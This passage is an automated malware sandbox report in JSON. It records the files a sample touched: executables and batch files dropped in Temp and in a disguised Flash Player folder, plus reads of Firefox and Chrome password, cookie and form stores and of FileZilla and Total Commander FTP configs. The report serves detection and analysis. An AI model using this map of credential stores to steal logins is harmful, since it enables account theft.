{ "analysis_details": { "creation_time": "2018-01-10 19:51 (UTC+1)", "execution_successful": true, "number_of_processes": 17, "reputation_enabled": true, "termination_reason": "timeout", "type": "analysis_details", "version": 2, "vm_analysis_duration_time": "00:10:14" }, "artifacts": { "files": [ { "filename": "C:\\Users\\aETAdzjz\\Desktop", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\desktop", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_ERROR_HANDLE", "hashes": [], "norm_filename": "std_error_handle", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", "hashes": [], "norm_filename": "\\??\\c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\popupkiller.exe", "hashes": [], "norm_filename": "c:\\popupkiller.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\stimulator.exe", "hashes": [], "norm_filename": "c:\\stimulator.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\TOOLS\\execute.exe", "hashes": [], "norm_filename": "c:\\tools\\execute.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\\\.\\NPF_NdisWanIp", "hashes": [], "norm_filename": "npf_ndiswanip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "1142692290abc4073f6cb4f996e782fa", "sha1_hash": "d71b914d853ef1017dda3d6a0cbd29127aac5730", "sha256_hash": "6c75444d6330e8c0c49f14bb9cb9c55b176820f769378554b9af13fce7115cba", "type": "file_hash", "version": 1 }, { "md5_hash": "18c3f549ae3ef0029f410aa06ca2ad50", "sha1_hash": "2b599a6397db74b8e074dd3a38eb0d2aad8b3be9", "sha256_hash": "4b2dba04ac1ce23a8d5c43f671a55182fdffb5e6a9366d0b019a1dae4afb7d53", "type": "file_hash", "version": 1 }, { "md5_hash": "734b4714f249866d6af2cd47b0929a3d", "sha1_hash": "323502054d5c3e5294e62377d1626ed6261a4673", "sha256_hash": "c36c81a8858e6c68f06d494aa33406ce0c407d672b802f431d273877e507e05f", "type": "file_hash", "version": 1 }, { "md5_hash": "e485ce36ccb80721109792301f591596", "sha1_hash": "61e99372d88b5d6412a3e465316e9622c3ff25d4", "sha256_hash": "68a132e520254be9c0f568603076331efc9b54e89f2eafc538a0397faaee5f06", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin", "operations": [ "access", "write", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "f3963866cf1b0a9cae95cf0ec6aae77e", "sha1_hash": "946fa1fe444c25648522407a7c690ea43e0d3837", "sha256_hash": "b4710fc930d2add348793b3160ed9c45b24ee8dcae605ee8ae198c107ef43285", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv", "operations": [ "access", "write", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "084cd34da60abfe463f4bcdf6ff6c7c4", "sha1_hash": "376783a4491e556cf55f5b6d3f5ef8edcb6d4faa", "sha256_hash": "ceddead7e5868e0d0bd135ad23248b1c6562111ccb65bdba7e1cc37314c02712", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\microsoft onedrive.rig", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "71c63dd6822598c7f7c7ab4c9ceb6ba9", "sha1_hash": "854db67ad532a4af63443f8e6f684762e3c9efca", "sha256_hash": "99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "operations": [ "access", "write", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "hashes": [], "norm_filename": "\\??\\c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "b1dd1aa15fb939d335f5c39a8ed85ab8", "sha1_hash": "3ea3a7be8ec7b7cce6e9cc1b52c77199858119a6", "sha256_hash": "8ba84a14936373863bb48478a9c13ac8d67e08ff26a4eb5c6bd88237587e6ffd", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "1142692290abc4073f6cb4f996e782fa", "sha1_hash": "d71b914d853ef1017dda3d6a0cbd29127aac5730", "sha256_hash": "6c75444d6330e8c0c49f14bb9cb9c55b176820f769378554b9af13fce7115cba", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.tmp", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\xeyzlap", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\xeyzlap", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\giilemz", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\giilemz", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "71c63dd6822598c7f7c7ab4c9ceb6ba9", "sha1_hash": "854db67ad532a4af63443f8e6f684762e3c9efca", "sha256_hash": "99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe", "operations": [ "access", "write", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "71c63dd6822598c7f7c7ab4c9ceb6ba9", "sha1_hash": "854db67ad532a4af63443f8e6f684762e3c9efca", "sha256_hash": "99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe", "operations": [ "access", "write", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\azuqkihi", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\azuqkihi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\xekeov", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\xekeov", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", "hashes": [], "norm_filename": "\\??\\c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\\\.\\pipe\\D3B6C4DE8CF79A854B549EE232F08C89", "hashes": [], "norm_filename": "\\device\\namedpipe\\d3b6c4de8cf79a854b549ee232f08c89", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "98de219891ef24cceaa12d1c41436654", "sha1_hash": "7ad5ad583dfd70ed21dd2acef592c931def67f0a", "sha256_hash": "14facf8fc3da422ce17a7695d1261c86078c97436ea643bc4d153aeda0904a88", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32", "hashes": [], "norm_filename": "c:\\windows\\system32", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\web data", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\login data", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\wcx_ftp.ini", "hashes": [], "norm_filename": "c:\\windows\\wcx_ftp.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\VirtualStore\\Windows\\wcx_ftp.ini", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\virtualstore\\windows\\wcx_ftp.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\wcx_ftp.ini", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\wcx_ftp.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\ghisler\\wcx_ftp.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\GHISLER\\wcx_ftp.ini", "hashes": [], "norm_filename": "c:\\programdata\\ghisler\\wcx_ftp.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\GHISLER\\wcx_ftp.ini", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\ghisler\\wcx_ftp.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\sitemanager.xml", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\filezilla\\sitemanager.xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\recentservers.xml", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\filezilla\\recentservers.xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\filezilla.xml", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\filezilla\\filezilla.xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\FileZilla\\sitemanager.xml", "hashes": [], "norm_filename": "c:\\programdata\\filezilla\\sitemanager.xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\FileZilla\\recentservers.xml", "hashes": [], "norm_filename": "c:\\programdata\\filezilla\\recentservers.xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\FileZilla\\filezilla.xml", "hashes": [], "norm_filename": "c:\\programdata\\filezilla\\filezilla.xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\sitemanager.xml", "hashes": [], "norm_filename": 